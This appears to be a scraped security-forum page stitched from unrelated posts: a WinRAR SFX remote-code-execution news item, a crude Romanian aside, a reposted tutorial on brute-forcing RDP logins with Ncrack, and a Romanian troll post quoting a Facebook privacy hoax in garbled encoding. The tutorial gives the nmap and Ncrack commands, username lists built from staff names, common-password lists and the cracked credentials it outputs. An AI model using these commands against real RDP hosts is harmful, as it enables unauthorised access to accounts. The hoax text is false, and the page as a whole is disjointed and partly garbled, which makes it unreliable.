Leaderboard

Beware Windows Users! A new dangerous unpatched Zero-day Vulnerability has been detected in the latest version of WinRAR affects over millions of users worldwide. According to Mohammad Reza Espargham, a security researcher at Vulnerability-Lab, the stable version of WinRAR 5.21 for Windows computers is vulnerable to Remote Code Execution (RCE) flaw. WinRAR is one of the most popular utility program used to compress and decompress files with more than 500 Million installations worldwide. The WinRAR RCE vulnerability lie under the ‘High Severity’ block, and scores 9 on CVSS (Common Vulnerability Scoring System). HOW WINRAR VULNERABILITY WORKS? Let’s take a look at its actions. The vulnerability can be used by any attacker smartly to insert a malicious HTML code inside the "Text to display in SFX window" section when the user is creating a new SFX file. WinRAR SFX is an executable compressed file type containing one or more file and is capable of extracting the contents of its own. According to proof-of-concept video published by Espargham, latest WinRAR vulnerability allows remote hackers to execute arbitrary code on a victim's computer when opening an SFX file (self-extracting file). The major disadvantage arises because of SFX files, as they start functioning as soon as the user clicks on them. Therefore, users cannot identify and verify if the compressed executable file is a genuine WinRAR SFX module or a harmful one. NO PATCH YET AVAILABLE Unfortunately, there is no patch yet available to fix this vulnerability. However, Windows users are advised to: Use an alternate archiving software Do not click files received from unknown sources Use strict authentication methods to secure your system

Da-te-n sloboz.

DISCLAIMER All information provided are for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). Tools and techniques demonstrated may be potential damaging if used inappropriately. All characters and data written on this post are fictitious. The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such SSH and VNC are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we already tried all the available remote attacks with no luck. We tried also to ARP poisoning the LAN looking to get user names and passwords, without succeeding. From a previus nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate further this possibility. First of all we need some valid usernames in order to guess only the passwords rather than both. We found the names of the IT guys on varius social networking websites. Those are the key IT staff: jessie tagle julio feagins hugh duchene darmella martis lakisha mcquain ted restrepo kelly missildine Didn’t take long to create valid usernames following the common standard of using the first letter of the name and the entire surname. jtagle jfeagins hduchene dmartis lmcquain trestrepo kmissildine Software required: Linux machine, preferably Ubuntu. nmap and terminal server client, sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-dev About Ncrack Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more. Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet .Ncrack - High-speed network authentication cracker Installation wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz mkdir /usr/local/share/ncrack tar -xzf ncrack-0.4ALPHA.tar.gz cd ncrack-0.4ALPHA ./configure make checkinstall dpkg -i ncrack_0.4ALPHA-1_i386.deb Information gathering Let’s find out what hosts in a network are up, and save them to a text list. The regular expression will parse and extract only the ip addresses from the scan. Nmap ping scan, go no further than determining if host is online nmap -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt Nmap fast scan with input from list of hosts/networks nmap -F -iL 192.168.56.0.txt Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST Nmap scan report for 192.168.56.10 Host is up (0.0017s latency). Not shown: 91 closed ports PORT STATE SERVICE 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1028/tcp open unknown 3389/tcp open ms-term-serv MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems) Nmap scan report for 192.168.56.101 Host is up (0.014s latency). Not shown: 96 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-term-serv MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems) Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds From the log we can see two machines with the microsoft terminal service port (3389) open, looking more in depth to the services available on the machine 192.168.56.10 we can assume that this machine might be the domain controller, and it’s worth trying to pwn it. At this point we need to create a file (my.usr) with the probable usernames previously gathered. vim my.usr jtagle jfeagins hduchene trestrepo kmissildine We need also a file (my.pwd) for the password, you can look on the internet for common passwords and wordlists. vim my.pwd somepassword passw0rd blahblah 12345678 iloveyou trustno1 At this point we run Ncrack against the 192.168.56.10 machine. ncrack -vv -U my.usr -P my.pwd 192.168.56.10:3389,CL=1 Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1' rdp://192.168.56.10:3389 finished. Discovered credentials for rdp on 192.168.56.10 3389/tcp: 192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd' 192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah' 192.168.56.10 3389/tcp rdp: 'jtagle' '12345678' 192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou' 192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1' Ncrack done: 1 service scanned in 98.00 seconds. Probes sent: 51 | timed-out: 0 | prematurely-closed: 0 Ncrack finished. We can see from the Ncrack results that all the user names gathered are valid, and also we were able to crack the login credential since they were using some weak passwords. Four of the IT staff have some kind of restrictions on the machine, except hduchene that might be the domain administrator, let’s find out. source: http://bailey.st/blog/2011/05/12/remote-desktop-credentials-auditing-with-ncrack/

Am observat ca multi "hackeri" de ocazie posteaza pe facebook tot ce vad pe RST. Hai sa facem putin misto de ei si sa punem anuntul de mai jos si sa vedeti cum se umple rahatul de facebook cu toate mesajele astea de rahat pe care le postez eu aici Eu am pus si deja jumatate din lista mea de prieteni l-au pus Sunt unii prosti care chiar cred ca facebook ar face publice conversatiile sau ar cere 6 dolari pentru a nu le pune. Nu au voie sa faca asa ceva, scrie clar: conversatiile sunt private si in plus nu au ei cum sa vada pe fiecare care posteaza sau nu acest mesaj in cronologie s.a.m.d Well: Troll FTW Acum e oficial! Acesta a fost publicat în mass-media. Facebook tocmai a lansat pre?ul de intrare: $ 5.99 pentru a p?stra abonamentul de mesajul t?u de stare care urmeaz? s? fie setat la "privat". Dac? lipi?i acest mesaj pe pagina dvs., acesta va fi oferit gratuit (nu pasta partaja) în cazul în care nu mâine, toate mesajele dvs. pot deveni publice. Chiar ?i mesajele care au fost ?terse sau fotografii nu sunt permise. La urma urmei, nu costa nimic pentru o copie simpl? ?i lipi?i mai bun? siguran?? decât s? regreta?i are dreptate. Canalul 13 ?tiri Vorbeam despre aceast? schimbare în politica de confiden?ialitate Facebook. Mai bine siguran?? decât s? regreta?i. Ca de 26/09/2015 la 01:16 ora standard de Est, eu nu dau Facebook sau orice entit??i asociate cu Facebook permisiunea de a folosi imagini mea, de informare, sau mesaje, trecut ?i viitor. Prin aceast? declara?ie, am s? notifice Facebook este strict interzis s? dezv?luie, copia, distribui, sau s? ia orice alt? ac?iune împotriva mea pe baza acestui profil ?i / sau con?inutul s?u. Con?inutul acestui profil este o informa?ie private ?i confiden?iale. Înc?lcarea vie?ii private poate fi pedepsit prin lege (UCC 1-308- 1 1 308-103 ?i Roma statut). NOT?: Facebook este acum o entitate public?. To?i membrii trebuie s? posta o not? ca aceasta. Dac? prefera?i, ave?i posibilitatea s? copia?i ?i insera?i aceast? versiune. Dac? nu publica o declara?ie cel putin o data va fi tactic care permite utilizarea a fotografiilor, precum ?i informa?iile con?inute în actualiz?rile de stare profil. NU Share. TREBUIE s? copia?i ?i lipi?i.